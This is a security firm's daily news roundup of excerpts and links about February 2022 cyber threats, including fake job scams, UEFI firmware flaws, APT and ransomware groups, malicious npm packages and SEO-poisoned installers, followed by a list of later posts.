February 2, 2022

Fortify Security Team
Feb 2, 2022

Title: FBI Warns of Fake Job Postings Used to Steal Money, Personal Info

Date Published: February 1, 2022

https://www.bleepingcomputer.com/news/security/fbi-warns-of-fake-job-postings-used-to-steal-money-personal-info/

Excerpt: “Scammers are trying to steal job seekers’ money and personal information through phishing campaigns using fake advertisements posted on recruitment platforms. The warning was published today as a public service announcement (PSA) on the Bureau’s Internet Crime Complaint Center (IC3). “The FBI warns that malicious actors or ‘scammers’ continue to exploit security weaknesses on job recruitment websites to post fraudulent job postings in order to trick applicants into providing personal information or money,” the FBI says.”

Title: Experts Found 23 Flaws in UEFI Firmware Potentially Impact Millions of Devices

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127506/breaking-news/uefi-firmware-vulnerabilities.html

Excerpt: “Researchers at firmware security company Binarly have discovered 23 vulnerabilities in UEFI firmware code used by the major device makers. The vulnerabilities could impact millions of enterprise devices, including laptops, servers, routers, and industrial control systems (ICS). All these vulnerabilities affects several vendors, including Fujitsu, Siemens, Dell, HP, HPE, Lenovo, Microsoft, Intel and Bull Atos. The flaws reside in the InsydeH2O UEFI firmware provided by Insyde Software and used by the impacted vendors. The analysis of the disassembly code revealed that the majority of these flaws were exploitable vulnerabilities in the System Management Mode (SMM).”

Title: Russia’s Escalation in Ukraine Sounds Cyber Defense Alarms

Date Published: February 2, 2022

https://www.bankinfosecurity.com/russias-escalation-in-ukraine-sounds-cyber-defense-alarms-a-18425

Excerpt: “Russia’s threat to Ukraine is reshaping notions of what it means to employ cyber operations as part of a conflict. Whether Russian President Vladimir Putin has even decided what he will do next remains unclear, experts say. But a number of military options remain available, and all of them would likely involve some form of cyber escalation, and could well impact such critical infrastructure as the energy and financial services sectors, according to Washington think tank Center for Strategic and International Studies.”

Title: Hacker Group ‘Moses Staff’ Using New StrifeWater RAT in Ransomware Attacks

Date Published: February 1, 2022

https://thehackernews.com/2022/02/hacker-group-moses-staff-using-new.html

Excerpt: “A politically motivated hacker group tied to a series of espionage and sabotage attacks on Israeli entities in 2021 incorporated a previously undocumented remote access trojan (RAT) that masquerades as the Windows Calculator app as part of a conscious effort to stay under the radar. Cybersecurity company Cybereason, which has been tracking the operations of the Iranian actor known as Moses Staff, dubbed the malware “StrifeWater.””The StrifeWater RAT appears to be used in the initial stage of the attack and this stealthy RAT has the ability to remove itself from the system to cover the Iranian group’s tracks,” Tom Fakterman, Cybereason security analyst, said in a report. “The RAT possesses other capabilities, such as command execution and screen capturing, as well as the ability to download additional extensions.””

Title: Malicious CSV Text Files Used to Install BazarBackdoor Malware

Date Published: February 1, 2022

https://www.bleepingcomputer.com/news/security/malicious-csv-text-files-used-to-install-bazarbackdoor-malware/

Excerpt: “A new phishing campaign is using specially crafted CSV text files to infect users’ devices with the BazarBackdoor malware.A comma-separated values (CSV) file is a text file containing lines of text with columns of data separated by commas. In many cases, the first line of text is the header, or description, for each column.”

Title: Experts Warn of a Spike in APT35 Activity and a Possible Link to Memento Ransomware op

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127526/apt/apt35-spike-memento-op.html

Excerpt: “The Cybereason Nocturnus Team observed a spike in the activity of the Iran-linked APT group APT35 (aka ‘Charming Kitten‘, ‘Phosphorus‘, Newscaster, and Ajax Security Team).The Phosphorus group made the headlines in 2014 when experts at iSight issued a report describing the most elaborate net-based spying campaign organized by Iranian hackers using social media. Microsoft has been tracking the threat actors at least since 2013, but experts believe that the cyberespionage group has been active since at least 2011.  The APT group previously targeted medical research organizations in the US and Israel in late 2020, and for targeting academics from the US, France, and the Middle East region in 2019. They have also previously targeted human rights activists, the media sector, and interfered with the US presidential elections.

Title: New Malware Used by SolarWinds Attackers Went Undetected for Years

Date Published: February 2, 2022

https://thehackernews.com/2022/02/new-malware-used-by-solarwinds.html

Excerpt: “The threat actor behind the supply chain compromise of SolarWinds has continued to expand its malware arsenal with new tools and techniques that were deployed in attacks as early as 2019, once indicative of the elusive nature of the campaigns and the adversary’s ability to maintain persistent access for years. According to cybersecurity firm CrowdStrike, which detailed the novel tactics adopted by the Nobelium hacking group last week, two sophisticated malware families were placed on victim systems — a Linux variant of GoldMax and a new implant dubbed TrailBlazer — long before the scale of the attacks came to light. Nobelium, the Microsoft-assigned moniker for the SolarWinds intrusion in December 2020, is also tracked by the wider cybersecurity community under the names UNC2452 (FireEye), SolarStorm (Unit 42), StellarParticle (Crowdstrike), Dark Halo (Volexity), and Iron Ritual (Secureworks).”
Title: ESET Releases Fixes for Local Privilege Escalation Bug in Windows Applications

Date Published: February 2, 2022

https://securityaffairs.co/wordpress/127536/security/eset-windows-applications-bug.html

Excerpt: “Antivirus firm ESET released security patches to address a high severity local privilege escalation vulnerability, tracked CVE-2021-37852, impacting its Windows clients. An attacker can exploit the vulnerability to misuse the AMSI scanning feature to elevate privileges in specific scenarios. “According to the report, submitted by the Zero Day Initiative (ZDI), an attacker who is able to get SeImpersonatePrivilege can misuse the AMSI scanning feature to elevate to NT AUTHORITY\SYSTEM in some cases.” reads the security advisory published by the company. “The SeImpersonatePrivilege is by default available to the local Administrators group and the device’s Local Service accounts, which are already highly privileged and thus limit the impact of this vulnerability.” The CVE-2021-37852 vulnerability was discovered by the security researcher Michael DePlante (@izobashi) who reported the bug reported to the company through the Zero Day Initiative (ZDI).”

Title: SEO Poisoning Pushes Malware-laced Zoom, TeamViewer, Visual Studio installers

Date Published: February 2, 2022

https://www.bleepingcomputer.com/news/security/seo-poisoning-pushes-malware-laced-zoom-teamviewer-visual-studio-installers/

Excerpt: “A new SEO poisoning campaign is underway, dropping the Batloader and Atera Agent malware onto the systems of targeted professionals searching for productivity tool downloads, such as Zoom, TeamViewer, and Visual Studio. These campaigns rely on the compromise of legitimate websites to plant malicious files or URLs that redirect users to sites that host malware disguised as popular apps. Upon downloading and executing the software installers, the victims unknowingly infect themselves with malware and remote access software.”

Title: Thousands of Malicious npm Packages Threaten Web Apps

Date Published: February 2, 2022

https://threatpost.com/malicious-npm-packages-web-apps/178137/

Excerpt: “More than 1,300 malicious packages have been identified in the most oft-downloaded JavaScript package repository used by developers, npm, in the last six months — a rapid increase that showcases how npm has become a launchpad for a range of nefarious activities. New research from open-source security and management firm WhiteSource has discovered the disturbing increase in the delivery of malicious npm packages, which are used as building blocks for web applications. Any app using a malicious code block could be serving up data theft, cryptojacking, botnet delivery and more to its users.”

Recent Posts

September 16, 2022

Title: Uber hacked, internal systems breached and vulnerability reports stolen Date Published: September 16, 2022 https://www.bleepingcomputer.com/news/security/uber-hacked-internal-systems-breached-and-vulnerability-reports-stolen/ Excerpt: “Uber suffered a...

September 15, 2022

Title: Webworm hackers modify old malware in new attacks to evade attribution Date Published: September 15, 2022 https://www.bleepingcomputer.com/news/security/webworm-hackers-modify-old-malware-in-new-attacks-to-evade-attribution/ Excerpt: “The Chinese 'Webworm'...

September 14, 2022

Title: Chinese hackers create Linux version of the SideWalk Windows malware Date Published: September 14, 2022 https://www.bleepingcomputer.com/news/security/chinese-hackers-create-linux-version-of-the-sidewalk-windows-malware/ Excerpt: “State-backed Chinese hackers...

September 13, 2022

Title: Cyberspies drop new infostealer malware on govt networks in Asia Date Published: September 13, 2022 https://www.bleepingcomputer.com/news/security/cyberspies-drop-new-infostealer-malware-on-govt-networks-in-asia/ Excerpt: “Security researchers have identified...

September 12, 2022

Title: Cisco confirms Yanluowang ransomware leaked stolen company data Date Published: September 12, 2022 https://www.bleepingcomputer.com/news/security/cisco-confirms-yanluowang-ransomware-leaked-stolen-company-data/ Excerpt: “Cisco has confirmed that the data leaked...

September 9, 2022

Title: Bumblebee Malware Adds Post-exploitation Tool for Stealthy Infections Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/bumblebee-malware-adds-post-exploitation-tool-for-stealthy-infections/ Excerpt: “A new version of the...

September 8, 2022

Title: North Korean Lazarus Hackers Take Aim at U.S. Energy Providers Date Published: September 8, 2022 https://www.bleepingcomputer.com/news/security/north-korean-lazarus-hackers-take-aim-at-us-energy-providers/ Excerpt: “The North Korean APT group 'Lazarus' (APT38)...